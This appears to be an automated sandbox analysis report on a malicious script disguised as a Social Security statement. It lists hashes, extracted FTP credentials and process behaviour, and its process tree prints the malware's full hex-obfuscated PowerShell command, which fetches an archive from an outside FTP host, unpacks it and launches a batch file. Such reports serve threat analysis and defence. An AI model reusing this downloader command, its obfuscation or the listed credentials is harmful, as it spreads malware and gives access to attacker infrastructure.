Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    07-08-2024 13:30

General

  • Target

    Your_New_Social_Security_Statement.wsf

  • Size

    5KB

  • MD5

    3b566e8ed4838f476d7dda08a9acc1b1

  • SHA1

    a426b95ac0992dda56fa15c52a2765101df19aee

  • SHA256

    fd7d4ec1d86c01b1f234b333941e7615fae1dd342fb2ec80a4e78a5cc5fb5a42

  • SHA512

    96a460d11d28f1f3ad545b646e1b015264cd4a86aa017a6c015a52a09d5638c09439668fb397427cd24d67de062c712010f24fc82bf9b18555c9d19f2b3e5f68

  • SSDEEP

    96:TkWXrHfYiu03P/hyUMl2N6SmxV3xzjpeX0T2MNdP+lHjfmMmpR0RQVWN:o0rTuI3HM06SifzjpeEjdwQoN

Score
10/10

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    142.44.252.6
  • Port:
    21
  • Username:
    dp
  • Password:
    pp...123456

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Your_New_Social_Security_Statement.wsf"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (( 24,77,65,62 , 43,'6c' ,69 , 65, '6e' , 74 ,20, '3d' , 20,'4e', 65 , 77 ,'2d' , '4f',62 , '6a' ,65 ,63 , 74 , 20 ,53, 79,73 ,74,65 ,'6d','2e' ,'4e' , 65 , 74, '2e' ,57, 65 , 62 ,43 , '6c', 69 ,65 , '6e' ,74 ,'3b', 20 , 24 , 77 , 65, 62,43, '6c' ,69 ,65,'6e', 74, '2e', 43 , 72 , 65 , 64 ,65, '6e', 74,69, 61,'6c' , 73, 20 ,'3d',20 , '4e' ,65,77 ,'2d', '4f' ,62, '6a' , 65 ,63, 74, 20, 53, 79,73, 74 , 65 , '6d', '2e', '4e' ,65, 74 , '2e' , '4e' , 65,74 , 77, '6f' , 72 ,'6b',43,72 ,65, 64, 65 , '6e' , 74, 69, 61, '6c',28 , 27,64, 70, 27,'2c' ,20 , 27 , 70 , 70 ,'2e', '2e' , '2e' , 31, 32, 33 ,34 , 35,36 , 27 , 29 , '3b' , 20 , 24, 77 , 65 ,62,43, '6c',69,65, '6e' ,74, '2e' , 44, '6f' ,77 ,'6e', '6c', '6f',61,64,46 , 69,'6c', 65 ,28 , 27, 66 , 74 ,70, '3a', '2f' , '2f' , 31, 34 , 32 ,'2e', 34 , 34 ,'2e', 32 , 35,32,'2e' ,36, '3a',32, 31, '2f',76 ,'2e' , '6d',70 ,34,27 ,'2c',20 , 27 ,43, '3a' , '5c',50,72 ,'6f' ,67,72, 61 ,'6d' ,44 ,61 ,74,61, '5c', '6d' ,'6f', '6f' ,'6e' , '2e', '7a',69, 70,27 ,29 , '3b', 20 ,45, 78,70,61,'6e' ,64, '2d',41,72 ,63,68 ,69,76 ,65, 20,'2d',50 , 61 ,74, 68, 20 ,27 ,43, '3a' , '5c',50, 72,'6f',67 , 72, 61 , '6d',44,61,74 ,61 , '5c','6d' ,'6f','6f','6e','2e', '7a' ,69 ,70,27,20, '2d' ,44 ,65, 73 , 74, 69, '6e', 61 , 74,69, '6f','6e',50,61, 74, 68, 20, 27 , 43 ,'3a' ,'5c' , 50, 72,'6f',67, 72 , 61 , '6d',44 ,61 , 74 , 61,'5c' ,27, '3b' , 20 , 52, 65 ,'6d' ,'6f' ,76,65 ,'2d' ,49,74,65,'6d',20 ,'2d' ,50 , 61, 74,68, 20 , 27 ,43 , '3a','5c', 50 ,72, '6f' , 67 , 72,61,'6d' ,44,61 ,74 ,61, '5c','6d' , '6f' , '6f', '6e', '2e','7a' ,69 ,70, 27,20,'2d', 46,'6f',72, 63,65 )|fOreACH-ObJECt{( [cHar] ( [cONVeRT]::TOiNT16( ( $_.TOstRIng()) ,16))) })-jOiN '' |. ( $PshOME[21]+$PsHOME[34]+'X')
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2540
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\ProgramData\Music\3DLight.bat
      2⤵
        PID:2900

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2540-4-0x000007FEF5F6E000-0x000007FEF5F6F000-memory.dmp

      Filesize

      4KB

    • memory/2540-5-0x000000001B550000-0x000000001B832000-memory.dmp

      Filesize

      2.9MB

    • memory/2540-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

      Filesize

      32KB

    • memory/2540-7-0x000007FEF5CB0000-0x000007FEF664D000-memory.dmp

      Filesize

      9.6MB

    • memory/2540-9-0x000007FEF5CB0000-0x000007FEF664D000-memory.dmp

      Filesize

      9.6MB

    • memory/2540-8-0x000007FEF5CB0000-0x000007FEF664D000-memory.dmp

      Filesize

      9.6MB

    • memory/2540-10-0x000007FEF5CB0000-0x000007FEF664D000-memory.dmp

      Filesize

      9.6MB

    • memory/2540-14-0x000007FEF5CB0000-0x000007FEF664D000-memory.dmp

      Filesize

      9.6MB